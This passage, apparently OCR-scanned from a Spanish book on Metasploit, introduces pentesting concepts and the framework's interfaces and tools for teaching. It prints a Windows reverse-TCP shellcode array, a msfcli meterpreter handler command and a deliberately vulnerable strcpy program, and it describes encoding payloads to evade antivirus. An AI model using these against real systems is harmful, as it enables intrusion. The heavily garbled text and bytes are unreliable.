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Introduccion 


El  presente  libra  tiene  como  objetivo  proporcionar  una  vision  global  sobre  el  framework  tie 
pentesting  conocido  como  Metasploit.  Esta  herramienta  dispone  de  gran  canlidad  de  funcionalidades 
las  cuales  son  rnuy  ulilizadas  en  el  dta  a  dla  por  los  auditores  de  seguridad  para  llevar  a  cabo  sus 
test  de  intrusion.  Es  esta  variedad  una  de  las  principales  caracteiisticas  imporlantes  que  proporciona 
Metasploit  dan-do  ai  usuario  el  poder  para  utilizar  exploits  de  calidad  comercial,  pero  ademas  toda 
una  infraestriiclura  para  realizar  otras  necesidades  del  auditor  como  pueden  ser  la  recoleecion  de 
informacion,  escaneos  en  busca  de  vulnerabilidades,  la  post-explotacion,  la  automatization  de  las 
tareas  de  auditon'a  o  la  generacion  de  sus  propios  exploits. 

La  seguridad  es  una  de  las.  ramas  de  la  informatiea  que  mas  rapido  avanza,  y  es  por  eilo  que  se 
debe  estar  bien  informado  de  las  vulnerabilidades  que  salen  diariamente,  por  ejetnplo,  mediante 
el  uso  de  listas  de  seguridad.  Imagtnese  liegando  a  una  empresa  la  cuai  debe  ser  audilada,  ya  sea 
caja  btanca  o  negra,  y  debe  enfrentarse  a  una  gran  cantidad  de  equipos,  los  cuales  seran  puestos  a 
prueba  por  su  tecnica  y  destreza  en  el  arte  de  la  intrusion.  Las  herramientas  con  las  que  cticnla  es  tin 
factor  indispensable  para  que  la  auditorla  llegue  a  buen  puerto,  pero  ademas,  debe  disponer  de  los 
conocimientos  para  poder  ejecutar  dichas  herramientas  con  coherencia.  Una  cosa  debe  prevalecer  y 
es  que  el  auditor  debe  realizar  una  serie  de  fases  previas  antes  de  lanzar  sus  herramientas  sobre  los 
sistemas,  i Metasploit  engloba  el  proceso  completo?  Logicamente  no.,  pero  se  estudiara  como  este 
framework  puede  realizar  fases  previas  a  la  exptotacion  del  sislema,  lo  que  signilica  que  Metasploit 
no  es  solo  explotacion. 

lmaglnese  que  sigue  en  la  empresa  objeto  de  la  auditorla  de  seguridad,  y  tras  marcarse  linos  objelivos, 
decide  emprender  el  proceso  de  recoleecion  de  infer  mac  i6n.  Este  proceso  puede  devolver  desde 
gran  cantidad  de  datos  relevantes  sobre  la  empresa  objeto,  o  una  minima  informacion  aparentemente  f 
no  muy  relevante.  Tras  el  analisis  de  esta  informacion  observa  que  existen  maquinas  o  sistemas  que 
pueden  eneonlrarse  en  riesgo,  ya  que  no  disponen  de  ciertas  actualizaciones  en  algunas  aplicaciones 
o  en  el  sistema  operativo.  Decide  lanzar  el  escaneo  de  vulnerabilidades,  con  la  informacion  recogida  i 
anleriormente,  que  tras  un  analisis  exhaustivo  han  aportado  datos  interesantes.  Tras  el  escaneo  se  j 
ha  confirmado  que  los  sistemas  son  vulnerables,  ahora  tiene  esa  sensacion  de  que  esta  eerca  de 
conseguir  uno  de  los  grandes  objetivos  que  es  lograr  entrar  en  el  sistema  y  demostrar  a  quien  le 
contrato  que  sus  sistemas  no  eran  todo  lo  seguro  que  el,  en  principio,  pensaba. 

Se  encuentra  cerca  del  extasis,  la  intrusion  en  el  sistema  ajeno,  el  sistema  prohibido,  su  reto,  su  meta. 
Conoce  el  punto  debil  del  sistema  y  dispone  de  las  herramientas  y  conocimientos  para  entrar  en  el. 

Es  la  hora  de  lanzar  el  exploit,  ese  pequelio  codigo  que  te  hace  restar  un  objetivo  en  lu  lista  inicial. 
Tras  la  ejecucion  del  exploit,  dispone  de  uno.  shell  o,  en  el  mejor  de  los  casos,  un  meterpreter,  el  cuai 
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ie  proporciona  un  gran  abanico  de  funcionalidades  para  reaiizar  sobre  la  maquina  vulnerada.  Ha 
llegado  al  summum,  pero  /,por  que  parar  aqui?  Dispone  de  una  maquina  para  poder  acceder  a  otras, 
y  conseguir  lograr  mas  objetivos. 

Aliora,  liene  un  eqiupo  sobre  el  que  poder  eievar  privileges,  obtener  otras  cuentas,  poder  ilegar  a 
lugares  domic  antes  no  podia  Ilegar,  y  en  definitiva  seguir  husmeando  en  esa  gran  red  interna  que 
dispone  la  empress  obielo.  Puede  hacerse  pasar  por  otros  usuarios,  acceder  a  recursos  compartidos, 
puede  baberse  converlido  en  el  nuevo  root  de  la  empresa.  La  post-explotaeiou  es  un  proceso  que  le 
ha  nyudado  a  sentir.se  como  en  casa  en  un  lugar  tan  extrano  y  ajeno  ai  auditor.  Pero  todo  toea  a  su  tin, 
su  Jornada  Inborn!  iermina  y  debe  preparar  ei  informe  con  todo  lo  que  ha  hecho  y  Ira  conseguido  en 
el  ilia  de  hoy.  Una  parte  nuiy  necesaria,  ya  que  debe  informal'  de  donde  estan  ios  fallos  de  seguridad 
.v  su  recomendacion  para  que  puedan  ser  evitados  en  un  futuro  proximo. 

id  iibro  presenta  la  exposicion  de  ideas  claras  y  de  manera  sencilla,  mediante  e!  uso  de  ejemplos 
praclicos,  sobre  Metasploit  framework,  sin  dejar  a!  margen  el  entorno  sobre  el  que  Metasploit  se 
ejeeuta  que  es  ei  test  de  intrusion.  Hoy  en  dia,  los  audilores  no  conocen  ei  enorme  potencial  que 
aporla  el  framework ,  o  smiplemente  no  disponen  de  los  conocimientos  tecnicos  para  obtener  el 
maximo  potencial  a  esta  herramienta.  Es  por  ello  que  es  deseo  del  atitoi  que  tras  la  lectura  de 
este  bbro,  el  auditor  encuentre  en  Metasploit  su  navaja  suiza,  siempre  complementada  con  otras 
hemunientas,  para  ei  proceso  de  auditoria  de  seguridad. 
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Capitulo  I 
Conceptos  basicos 


1.  Definicioiies 

Si  es  la  primera  vez  que  usa  Metasploit  debe  conocer  de  que  consta  este  framework  antes  de  poder 
trabajar  con  el.  Metasploit  puede  ser  tachado  como  un  entorno  de  dificil  nianejo  y  configuracion 
pero  a  traves  de  las  Irojas  de  este  Iibro  podra  descubrir  que  en  la  mayoria  de  los  casos  es  de  sencillo 
manejo  y  muy  flexible.  Las  definicioiies  que  se  exponen  a  continuacion  le  aytidan  a  distinguir 
distintas  herramienlas  que  componen  el  framework,  hay  que  tener  en  cuenta  que  este  se  actiializa  en 
peqnehos  periodos  de  tiempo  y  se  implementan  nuevas  herramienlas  que  se  introducen  en  el, 

A  continuacion  se  exponen  terminos  que  se  pueden  encontrar  en  el  dia  a  dia  de  un  auditor, 
!o  cual  aporta  una  base  para,  saber  que  conceptos  se  estan  tratando.  Adem£s,  se  especifiean  las 
vulnerabi  lidades  mas  destacadas  y  definicioiies  propias  del  entorno  de  Metasploit. 

Software  liable  vs  Software  seguro 

El  software  liable  es  aquel  que  hace  lo  que  se  supone  que  debe  hacer.  El  software  seguro  es  aquel 
que  hace  lo  que  se  supone-  que  debe  hacer  y  nada  mas.  Son  ios  ocasionales  y  sorprendetites  “algo 
mas”  los  que  producen  inseguridad  en  tin  sistema.  La  solucion  ideal  es  utilizar  software  seguro 
siempre,  pero  e!  mimtlo  real  no  es  el  ideal,  por  lo  que  se  deben  reaiizar  cieitas  acciones  para  mitigar 
ese  “algo  mas'  que  puede  reaiizar  cierto  software. 

G1  software  es  desarrollado  por  seres  humanos  por  lo  que  es  imperfecto  por  naturaleza,  son  esos  fallos 
de  programacion  los  que  en  muchas  ocasiones  provocan  que  e!  software  disponga  implicitamente  de 
vtiinerabilidades.  Si  un  atacante  detecta  esa  vulnerabi  I  idad  puede  disponer  de  una  puerta  de  acceso 
al  sistema  en  el  mejor  de  los  casos. 


Bug 

Un  bug  es  el  resultado  de  un  fallo  de  programacion  durante  el  proceso  de  ereacion  o  desaiToilo  de 
las  aplicaciones.  Este  fallo  puede  haberse  introducido  en  cualquiera  de  las  etapas  del  cicio  de  vida 
de  una  aplicacion,  aunque.  por  lo  general  ocurre  en  ia  etapa  de  implementacion. 
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Exploit 

Exploit  viene  del  verbo  ingles  to  exploit,  que  significa  explotar  o  aproveehar.  Un  exploit  es  un 
eodigo  escrito  con  el  fin  de  aproveehar  un  error  de  prograniacion  y  la  intention  de  oblener  diversos 
privilegios.  Un  buen  numero  de  exploits  tienen  su  origen  en  un  conjunto  de  fallos  de  programaefon 
simi  lares. 

Normalmente,  con  la  ejecucion  de  un  exploit  el  aiacante  busca  lomar  el  control  de  una  maquina  de 
nianera  ilicita,  realizar  una  escalada  de  privilegios  en  un  sistema  local,  sobre  ei  que  no  dispone  de 
olios  o  sobre  una  maquina  remota  comprometida,  o  realizar  un  ataque  de  denegacidn  de  servicio, 
catisando  la  caida  de  una  aplicacion  o  tin  sislema,  evitando  el  normal  funcionamiento  de  un  servicio. 

For  lo  general  el  lenguaje  eslrella  para  desarrollo  un  exploit  es  el  lenguaje  C.  Tambien  se  pueden 
realizar  exploits  en  otros  lenguajes  como  Ruby,  Java  o  Python,  pero  como  se  ha  indicado 
anteriormente  lo  normal  es  la  escritura  de  estos  en  C. 

Algunos  de  los  grupos  de  vulnerabilidades  mas  conocidos  son: 

-  Vulnerabilidades  de  desbordamiento  de  buffer, 

-  Vulnerabilidades  de  error  de  formato  de  cadena  o  format  string  bugs. 

Vulnerabilidades  de  Cross  Site  Scripting,  XSS. 

~  Vulnerabilidades  de  SQL  Injection. 

Payload 

Es  la  parte  del  eodigo  de  un  exploit  que  tiene  conio  objetivo  ejecutarse  en  la  maquina  victims  para 
realizar  la  action  maliciosa.  La  manera  optima  para  entender  el  significado  de  payload  es  medianle 
el  uso  de  ejemplos.  Un  payload  puede  ser  el  eodigo  que  se  inyecta  en  una  maquina  a  traves  de 
un  exploit,  y  el  cuai  permite  al  atacante  ejecutar  eodigo  en  la  maquina  remota.  Ese  eodigo  puede 
ser  el  que  implement  una  shell  inversa,  es  decir,  la  maquina  victima  lanzara  una  conexion.hacia 
la  maquina  del  atacante  devolviendoie  una  linea  de  comandos  para  que  pueda  interactuar  con  la 
maquina  vulnerada. 

Otro  ejemplo  de  payload  puede  ser  una  bind  shell,  es  decir,  una  vez  se  ha  introducido  el  eodigo  a 
ejecutar  en  la  maquina  remota  este  deja  a  la  escucha  en  un  puerto  de  la  maquina  una.  shell.  El  atacante 
se  conectara  a  dicho  puerto  mediante  conexion  directa  y  dispondra  de  acceso  y  ciertos  privilegios. 

Un  payload  tambien  puede  ser,  simplemente,  conseguir  ejecutar  en  la  maquina  remota  una  secuencia 
de  comandos  sobre  la  maquina  victima.  Por  ejemplo,  para  realizar  una  denegacidn  de  servicio  sobre 
una  aplicacion  en  una  maquina  vulnerable. 

Shellcode 

Es  un  conjunto  de  instrucciones  usadas  como  un  payload  cuando  se  produce  el  proceso  de  explotacion 
del  sistema.  La  shellcode  son  ordenes,  generalmente,  escritas  en  lenguaje  ensamblador.  Para  generar 


este  tipo  de  eodigo,  normalmente,  se  utiliza  un  lenguaje  de  mayor  nivel  como  puede  ser  C.  Despues, 
este  eodigo  al  ser  compilado,  genera  el  eodigo  de  maquina  resultante,  el  cual  es  denominado  opcode. 

Las  shellcodes  deben  ser  de  tamano  pequeno  para  poder  ser  inyectadas  dentro  de  la  pila  de 
la  aplicacion,  que  es  generalmente  un  espacio  reducido.  Es  muy  comun,  que  en  el  proceso  de 
compilacion  de  la  shellcode  se  generen  los  ilamados  bytes  nulos,  los  cuales  provocan  la  frenada 
de  la  ejecucion  del  eodigo  de  esta.  El  usuario  que  genere  el  eodigo  debe  tener  en  cuenta  esto,  y 
debe  encargarse  de  remplazar  las  instrucciones  que  general!  estos  bytes  nulos  por  otras  que  no  los 
produzcan,  o  realizando  una  operacion  XOR,  y  de  esta  forma  conseguir  que  la  shellcode  se  ejecute 
sin  problemas. 


/* 

*  windows/shell/reversetcp  -  298  bytes  (stage  1} 

*  littp: //www. raetasploit.com 

*  LHOST=192 . 168.1.1,  LPORT=<5444,  !\everseConnectRetries=5, 

*  EXITFUNC=process ,  XuitialAUtoKunScript=>  AutoRunScript= 

V 

unsigned  char  buff]  = 

"\xfc\xe8\x89\X00\X00\x80\x60\x89\xe5\x31\xd2\x64\x8b\x52\x3OM 
',\x8b\x52\x0c\x8b\x52\xl4\x8b\x72\x28\x8f\xb7\x4a\x26\x31\xff  " 
"\x3i\xc0\xac\x3c\x6i\x7c\x82\x2c\X28\xcl\xcf\x0d\x01\xc7\xe2" 
"\xf0\x52\x57\x8b\x52\xie\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 
“\xc0\x74\x4a\x91\xd0\x50\x8b\x48\xl8\xBb\x58\x20\x01\xd3\xe3" 
“ \x3c\x49\x8b\x34\x8b\x81\xd6\x3 l\xf  f \x3 l\xc0\xac\xcl\xc  f \x0d  * 
”\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 
"\x8b\x58\x24\x81\xd3\x66\x8b\x0c\x4b\x8b\x58\xlc\x01\xd3\x8btt 
“\X04\xBb\x01\xd0\xB9\x44\x24\x24\x5b\xSb\x61\x59\x5a\x51\xff “ 
"\xe0\x58\x5f\x5a\x8b\xl2\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 
,,\x77\x73\x32\x3f\x54\xe8\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" 
"\x80\x80\x29\xc4\x54\x50\x68\x29\x80\xBb\x00\xf f\Xd5\x50\x50" 
',\x50\x50\x40\x50\x48\x50^x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a,, 
u\x85\xB8\xc0\xa8\x01\x01\x68\x02\x00\xll\x5c\xB9\xe6\)(6a\xl0" 
"\x56\x57\x68\x99\xa5\x74\xBl\xff\xd5\x85\xc0\x74\x0c\>(ff\x4e,l 
"\x88\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x80\x6a\x04\x56" 
“\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\xl0“ 
"\x00\x89\x56\x6a\X00\x6B\x58\xa4\x53\xe5\xff\xd3\x93\x53\x6a" 
"\xS0\x36\x53\x57\x68\x82\xd9\XC8\x3f\xf  f\xd5\X01\XC3\jt29\XC6" 
"\x85\xf6\x75\xec\xc3“ ; _ 

Fig  1 .01:  Shellcode  generada  con  Msfpayload. 


O-day  exploit 

Un  O-day  exploit  es  una  de  las  caracteristicas  mas  peligrosas  en  el  ambito  de  la  seguridad  informatica. 
Un  exploit  de  dia  cero,  o  O-day  exploit,  es  un  eodigo  malicioso  que  permitira  a  un  atacante  obtener 
el  control  remoto  de  un  sistema.  Como  particularidad  hay  que  recalcar  que  la  vulnerabilidad  de  la 
que  se  aprovecha  este  exploit  es  desconocida  por  los  usuarios  y  el  fabricante  del  producto.  Es  este 
hecho  el  que  hace  un  O-day  exploit  como  un  instrumento  muy  peligroso  en  una  guerra  infonnalica. 

Este  tipo  de  exploits  disponen  de  una  ventana  temporal  existente  entre  el  tiempo  en  el  que  se  publica 
la  amenaza  o  exploit  y  el  tiempo  en  el  que  aparecen  los  codigos  que  corrigen  dicha  vulnerabilidad. 
En  general,  los  parches  o  actual izaciones  son  desarrollados  por  los  responsables  de  la  aplicacion. 
Es  importante  que  las  empresas  dispongan  de  planes  de  actuacion  ante  estos  hechos,  ya  que  sus 
sistemas  pueden  quedar  expuestos  a  las  amenazas  desconocidas. 
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Capihtlo  J.  Conceptos  basicos 


Buffer  Overflow 

Esta  vuinerabilidad,  bastante  comun  y  con  mucha  historia  en  la  informatica,  ocurre  cuando  una 
aplicacion  no  comprueba  correctamente  el  numero  de  bytes  que  son  almacenados  en  una  direction 
de  memoria,  o  buffer ,  previamente  reservada.  De  este  modo,  la  cantidad  de  bytes  que  se  van  a 
almacenar  son  superiores  a  la  cantidad  reservada  para  ta!  ftn. 

Pam  que  se  pueda  entender  mejor  se  propone  el  siguiente  codigo  en  lenguaje  C.  El  codigo  muestra 
eonio  se  copiara  ei  primer  argument©  que  se  le  pasa  a  la  aplicacion  argv[l]  a  un  buffer  reservado 
y  eslalico  con  10  bytes  de  lipo  char.  No  existe  ninguna  comprobacion  de  que  la  cadena  que  se 
pasa  a  I  programa  medianle  la  variable  argv[l]  sea  igiial  o  inferior  a  10  caracleres.  /,Es  este  codigo 
vulnerable? 

It  inrhide  •  strlio.h> 

ini  inn  in  { in!:  a  r  <jc ,  char  **argv) 

{ 

char  l:mf [ 10 ] ; 
print f  {"holamuncio") ; 
s  t.  rcpY  (bu  f ,  a r gv  [  1  ] )  ; 
return  0; 

) 

Este  programa  no  limits  la  cantidad  de  bytes  que  se  intentaran  almacenar  en  la  memoria  reservada 
para  el  buffer,  por  lo  que  se  podra  escribir  fuera  de  este.  Al  escribir  en  las  direcciones  de  memoria 
adyacenles  al  buffer  se  podra  inyectar  codigo  ejecutabie  para  conseguir  ciertos  privilegios  sobre  el 
proccso  y  sobre  la  maquina  objeto,  o  simplemente  ocasionar  un  crash  o  caida  de  la  aplicacion. 

SQL  Injection 

Es  una  de  las  grandes  vulnerabilidades  informaticas  de  la  historia.  I-Ioy  en  dia,  copa  los  primeros 
puestos  en  numero  de  vulnerabilidades  conocidas,  junto  a  XSS  y  buffer  overflow .  Consiste  en  la 
inyeccion  de  codigo  SQLen  el  nivel  de  validation  de  una  aplicacion  que  realiza  eonsultas  sobre  una 
base  de  datos. 

En  ofras  palabras,  la  aplicacion  no  chequea  o  filtra  las  variables  utilizadas  por  el  programa  para 
recibir  los  parametros  y  se  consigue  inyectar  codigo  SQL  dentro  del  propio  codigo  de  la  aplicacion. 

Normalmente  es  ejecutada  en  aplicaciones  web,  con  lo  que  se  puede  obtener  informacion  que  existe 
en  la  base  de  datos  del  sitio  en  cuestion.  Tambien  se  puede  encontrar  en  aplicaciones  de  escritorio. 


Metasploit 

Es  el  nombre  que  recibe  el  proyecto,  open  source,  sobre  seguridad  informatica.  Este  proyecto  faeilita 
el  trabajo  al  auditor  proporcionando  informacion  sobre  vulnerabilidades  de  seguridad,  ayudando  a 
explotarlas  en  los  procesos  de  pentesting  o  test  de  intrusion. 


Fig  1 .02:  Logo  tie  Metasploit. 


Ei  subproyecto  mas  famoso  del  que  dispone  es  Metasploit  framework,  o  simplemente  denominado 
Metasploit.  Originalmente  ftie  desarrollado  en  el  lenguaje  de  programacion  Perl,  para  que  con  el 
paso  del  tiernpo  fuera  escrito  de  nuevo  bajo  el  lenguaje  Ruby.  Este  framework  es  un  conjunto  de 
herramientas  con  las  que  el  auditor  puede  desarrollar  y  ejecutar  exploits  y  lanzarlos  contra  maquinas 
para  comprcbar  la  seguridad  de  estas.  Otras  de  las  funcionalidades  que  aporta  es  tin  archivo  de 
shellcodes,  herramientas  para  recolectar  informacion  y  escanear  en  busca  de  viiinerabilidades. 

Modules 

Metasploit  dispone  de  mbdulos  los  cuales  ayudan  a  aumentar  de  manera  sencilla  las  funcionalidades 
del  framework.  Un  modulo  es  una  pieza  o  bloque  de  codigo  que  implementa  una  o  varias 
funcionalidades,  como  puede  ser  la  ejecucion  de  un  exploit  concreto  o  ia  realizacion  de  un  escaneo 
sobre  maquinas  remotas.  Los  modu  los  que  componen  el  framework  son  el  nticleo  de  Metasploit  y 
los  que  hacen  que  sea  tan  poderoso.  Estos  pueder.  ser  desarroilados  por  los  usuarios  y  de  esta  manera 
ampliar  ei  framework  de  manera  personalizada,  y  en  funcion  de  las  necesidades  del  auditor. 


XSS  (Cross-Site  Scripting) 

Es  otra  de  las  grandes  vulnerabilidades  de  la  informatica,  permile  a  un  atacante  inyectar  codigo  en 
pdginas  web  que  son  visitadas  por  un  usuario  o  victinia.  El  objetivo  de  esta  vuinerabilidad  es  que 
una  vlctima  entre  en  un  sitio  web  y  la  presentacion  que  se  haga  de  este  se  encuentre  manipulada 
provocando  un  robo  de  informacion  o  manipulacion  sobre  los  datos  que  se  visualizan. 


Interfaces  Metasploit 

Metasploit  dispone  de  varias  interfaces  con  las  que  interactuar  con  el  framework.  El  usuario  puede 
interactuar  mediante  una  interfaz  grafica,  Hnea  de  comandos  o  consola.  Tambien  se  dispone  de  la 
posibilidad  de  acceder  directamente  a  las  funciones  y  modulos  que  componen  el  framework.  Esta 
accion  puede  resultar  muy  util  para  uti  1  tzar  ciertos  exploits  sin  necesidad  de  lanzar  todo  el  entorno.' 
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La  primera  inlerfaz  que  se  presenta  es  msfcomole.  Es  el  todo  en  uno  del  framework ,  ei  auditor 
dispone  de  una  consoia  desde  la  cual  puede  acceder  a  todas  las  opciones  disponibles  de  Metasploit. 
La  consoia  dispone  de  un  gran  nutnero  de  comandos,  ios  cuales  disponen  de  una  sintaxis  sencilla 
y  facil  de  recordar.  Esta  interfaz  se  lanza  ejecutando  el  comando  imfconsole  en  una  terminal,  si  se 
encuentra  en  Linux. 

|root@roat : /pentes t/exploits/f rat»ework3#  »sf console  | 
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=[  welasploil  v3.7.Q-retease  fcore:3.7  api:1.0| 
+  ..  ..»[  684  exploits  -  355  auxiliary 
*  --  217  payloads  -  27  encoders  -  8  nops 


Fig  1.03:  Consoia  tie  Metasploit  framework. 


La  segunda  interfaz  que  se  presenta  es  Armitage.  Esta  interfaz  proporciona  un  entorno  graftco  e 
intuitivo  al  auditor  para  Jlevar  a  eabo  el  test  de  intrusion  y  entender  el  hacking  de  manera  sencilla. 
Esta  interfaz  se  lanza  ejecutando  el  comando  armitage  en  una  terminal. 


Armitage .  View,  ...Hosts :  ^Attacks  ■  JVo  r^spaoe 


lnet.6  addr:  ::  1/128  Scope :Host 

UP  LOOPBACK  RUNHIHC  WTU!  16436  Hetrinl 
RK  pachetsj80254  errorsio  dropped**)  overrunsiO  frameio 
TK  packets*80254  errorsiO  droppedtO  overruns*!)  carrieriO  , 
msf  exploit(ms08_067  netapi)  > 


Fig  1.04:  Interfaz  grafica  Armitage. 


CapUulo  I.  Conceptos  basicos 


La  tercera  interfaz  que  se  presenta  es  la  web  U1  de  Metasploit.  Con  esta  interfaz  se  puede  gestionar 
ei  test  de  intrusion  de  manera  remota,  sin  necesidad  de  disponer  del  framework  en  local,  pudiendo 
realizar  casi  todas  las  opciones  que  pueden  realizarse  desde  la  consoia. 


©metasploit' 

▼  community 


Home  default  ,  1 


•a^GofoHosl  Oeble  Scan  jgjj  Import  @Hcxpa»a  *  ©Modules  Brute  force  ©  Expbi  Q  New  Host 


J  Ho  sis  |[£f  Noies’lPg  Services']  [©  VolnetabllitioTH  ^  Captured  Data]  - 

Show  [jOO  Q  entries  .  ,  ' 

0  If  Address  *  ;  Usme  $  OS  Mamc 

B  Micros, wndo«,(XP) 

(VlrtualOox) 


v  t  Version^  |  Purpose,,’  ^  Services; !  Veins  ,  ,  Holes 


Showing  1  to  t  of  1  entries 


Fig  1 .05:  Inlerfaz  web  Metasploit. 


La  cuarta  interfaz  que  se  presenta  es  msfcli.  Esta  interfaz  no  permite  la  interaction  directa,  esta 
pensada  para  automatizar  la  explotacion  de  los  sistemas.  Esta  interfaz  se  lanza  ejecutando  el  comando 
msfcli,  el  cual  dispone  de  un  parametro  en  el  que  se  indica  el  modulo  que  se  requiere,  modulo  exploit 
o  auxiliar,  y  opciones  en  funcion  de  lo  que  el  auditor  necesite.  Mas  adeiante  se  especificara  en  mayor 
delalle  esta  herramienta. 

rootfaroctj/pentest/axploits/frameworkB#  msfcli  exploit/multi/handler  payload=win 
dows/meterpreter/reverse_tcp  lhost=192. 168. 1.40  lport=4444  E 
1*1  Please  wait  while  we  load  the  module  tree... 


/  1/  1/  1  1/  I  t  i  /  \_l/  \J/  /  \_!  I 
I  I  \J\J\J\J\J  \1  \U  IJU  !_/!„/ 
f\ 

W 


={  pietasploit  v3. 7. 9 -release  (core:3.7  api:l.Qj 
t  --  -=I  684  exploits  -  355  auxiliary 
+  ..  ,-s=[  217  payloads  -  27  encoders  -  0  nops 

payload  =>  windows/meterpreter/reversetcp 
l host  =>  192.168.1.48 
Iport  =>  4444 

1*1  Started  reverse  handler  on  192.168.1.40:4444 


Fig  1.06:  Interfaz  msfcli. 


Herramientas  del  framework 

Se  disponen  de  ciertas  herramientas  que  dan  acceso  directo  al  auditor  para  trabajar  con  funcional idades 
especificas  del  framework.  Estas  herramientas  pueden  ser  utilizadas  en  situaciones  especiftcas  por 
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parte  del  usuario,  sin  necesidad  de  lanzar  la  consola  y  cargar  el  entomo  al  completo.  Se  pretende  dar 
a  conocer  y  del mir  dichas  herramientas,  explicandose  con  mayor  detaile  mas  adelante 

Msfpayload 

Es  u na  herramienta  orientada  a  todo  lo  relacionado  con  el  ambito  de  las  shellcodes.  Msfpayload 
es  capaz  de  generar  shellcodes  para  distintos  lenguajes  de  programacion,  ejecutables  que  inyecten 
el  codigo  malicioso  en  la  maquina  vlctima  tras  su  ejecucibn,  lister  las  shellcodes  disponibles  en 
Metasploit ,  son  sus  principales  funcionalidades.  Normalmente,  se  utiliza  para  generar  el  codigo 
que  se  utilizara  con  un  exploit  que  no  se  encuentre  en  el  framework,  pero  tambien  puede  ayudar  a! 
auditor  para  probar  los  diferentes  tipos  shellcodes. 

Msfencode 

Esta  herramienta  se  encarga  de  dificultar  a  los  sistemas  de  intrusion,  IDS,  e  infection,  antivirus,  ia 
detection  del  payload.  Adeinas,  permite  eliminar  los  bytes  nulos  que  se  generan  en  la  creacion  de 
una  sheilcode.  /,En  qub  se  basa  msfencodel  Se  dispone  de  una  serie  de  encoders  o  codificadores  para 
ofuscar  de  algiin  mode  estos  payloads  con  los  objetivos  nombrados  anteriormente. 

Esta  herramienta  es  interesante  cuando  se  dispone  de  un  payload  generado  con  msfpayload,  cl 
dial  puede  disponer  de  bytes  nulos,  xOO,  xff.  Aderoas,  la  codification  del  cocligo  es  practicamente 
obiigatoi'ia  si  se  requiere  que  ese  executable  llegue  a  una  maquina  con  aplicaciones  de  proteccion. 

nt  sf venom 

Esta  herramienta  uni  flea  las  aplicaciones  msfencode  y  msfpayload.  Su  principal  ventaja  es  disponer 
de  ambos  comandosen  una  sola  instancia  y  un  incremento  de  velocidad  en  la  generacion  de  las 
aociones.  Simplemente,  se  puede  tratar  dicha  herramienta  como  una  ayuda  al  auditor  para  disponer 
de  todo  lo  necesario  para  generar  los  payloads  y  codificarlos  o  cifrarlos  desde  una  misma  herramienta 
sin  necesidad  de  ulilizar  formatos  intermedios. 

Msfpescan  y  msfeifscan 

La  herramienta  msfpescan  permite  escanear  ficheros  ejecutables  o  DLLs  de  Windows  para  encontrar 
mstrticciones  de  codigo  maquina  sobre  una  imaged  basada  en  memoria.  Por  otro  lado  la  herramienta 
msfeifscan  permite  reaiizar  las  mismas  tareas  pero  sobre  las  aplicaciones  ELF  en  sistemas  operatives 
Hum 

Msfrop 

Hov  en  dla  los  desarrolladores  de  exploits  se  encuentran  con  DEP {Data  Execution  Prevention i, 
habililado  por  defecto  en  los  sistemas  operativos  mas  nuevos.  DEP  previene  la  ejecucibn  del 
sheilcode  en  la  zona  de  memoria  denominada  como  pila.  En  este  punto  los  desarrolladores  se  vieron 
obligados  a  biiscar  como  voltear  esta  mitigacibn,  desarrollando  la  Ilamada  ROP(Return-oriented 
programming).  El  payload  ROP  se  crea  utilizando  conjuntos  de  instrucciones  ya  existentes  en 
binarios  en  modo  no  ASLR  ( Address  Space  Layout  Randomization),  y  de  este  modo  conseguir  que 


el  sheilcode  sea  ejecutable.  Cada  conjunto  conseguido  debe  acabar  con  la  instruccion  RETN  para 
continuar  con  la  cadena  ROP.  Se  puede  encontrar  que.  este  tipo  de  conjuntos  se  Hainan  gadgets. 

La  herramienta  msfrop  realiza  un  analisis  sobre  el  binario  que  se  le  pasa  y  tras  el  procedi miento 
devolvera  los  gadgets  utilizables.  ^ 

Msfcl 

Esta  herramienta  proporciona  un  demonio  o  servicio  de  Metasploit  el  cual  genera  un  listener  en  un 
puerto.  Los  clientes  jiodran  conectar  con  este  servicio  y  disponer  de  su  propia  intertaz  de  consola, 
hay  que  tener  en  cuenta  que  todos  los  clientes  utilizan  la  misma  instancia  del  framework. 

Los  clientes  suelen  conectarse  a  traves  de  ia  famosa  herramienta  netcat,  indicando  la  direccibn  IP  y 
e!  puerto.  Este  servicio  da  flexibilidad  y  la  posibilidad  de  utilizar  el  framework  en  remoto  eon  todas 
las  funcionalidades  disponibles  en  local. 

Arquitectura  de  Metasploit 

En  la  imagen  se  puede  visualizar  la  arquitectura  de  la  que  esta  compuesta  Metasploit.  En  ella  se 
pueden  observar  3  libredas  crlticas  como  son  rex,  msf  core  y  msf  base,  las  distintas  interfaces  ya 
explicadas  en  este  libro  y  los  6  tipos  de  mbdu  los  que  se  dispone  en  el  framework.  Las  herramientas 
MSF  y  los  plugins  externos  tambien  se  especifican  y  se  puede  visualizar  con  que  I  i  brer  la  interactuan 
directamente. 


Fig  1.07;  Arquitectura  de  Metasploit. 


La  !i  brer  la  rex  es  la  basica  y  se  encarga  de  la  mayorla  de  las  tareas,  manejando  sockets,  protocolos, 
por  ejemplo,  SSL,  SMB,  HTTP,  y  otras  operaciones  interesantes  como  son  las  codiftcaciones,  por 
ejemplo,  XOR,  Base64  o  Unicode. 


Las  libredas  msfcore  y  msfbase  proporcionan  APIs  al framework.  Las  interfaces,  modules  y plugins 
interactuan  con  la  API  base  y  core  que  se  encuentra  en  ambas  librerias.  Con  este  esquema  se  puede 
entender  que  las  libredas  son  el  nucleo  del  framework  y>  que  todos  los  elementos  de  alrededor 
dependen  de  estas.  Ruby  es  el  lenguaje  encargado  de  implementor  el  nucleo  de  Metasploit. 

Tipos  de  modulos  en  Metasploit  framework 

Los  modulos  implementan  las  funcionalidades  del  framework.  Existen  6  categodas,  a  dla  de  hoy, 
aunque  en  muchos  libros  y  sitios  web  de  Internet  se  especil'ican  5  categorias,  ya  que  no  se  considera 
el  modulo  de  post-exp lotaci on  como  uno  independiente. 

root@root:/pentust/exploits/franiov(ork3/flto(fules#  Is 

auxiliary  encoders  exploits  Modules. rb.ts.rb  nops  payloads  post 

root@root:/pentest/exploits/franiework3/inodul85#  Is  auxiliary/ 

admin  crawler  fuzzers  pdf  server  spoof  voip 

